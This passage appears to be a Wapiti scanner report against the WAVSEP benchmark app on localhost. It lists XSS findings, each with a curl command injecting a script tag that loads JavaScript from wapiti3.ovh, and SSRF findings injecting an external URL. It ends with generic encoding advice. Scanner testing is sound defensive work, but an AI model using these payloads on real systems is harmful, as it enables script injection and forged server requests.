curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0nxq5wlghz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2si7q5n4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2si7q5n4z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3vkbrevqnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3vkbrevqnz.js%3E%3C%2Fscript%3E"
Solutions
The best way to protect a web application from XSS attacks is ensure that the application performs validation of all headers, cookies, query strings, form fields, and hidden fields. Encoding user supplied output in the server side can also defeat XSS vulnerabilities by preventing inserted scripts from being transmitted to users in an executable form. Applications can gain significant protection from javascript based attacks by converting the following characters in all generated output to the appropriate HTML entity encoding: <, >, &, ", ', (, ), #, %, ; , +, -.
References


Server Side Request Forgery

Description
Server Side Request Forgery description

Vulnerability found in /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:25+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1438/746172676574/1527559525-174.119.60.74.txt
GET /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:23+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1451/746172676574/1527559523-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1854/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1857/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1860/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1862/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1865/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1867/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1868/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1870/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1874/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1875/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1877/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1878/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1881/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1883/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1886/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1888/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
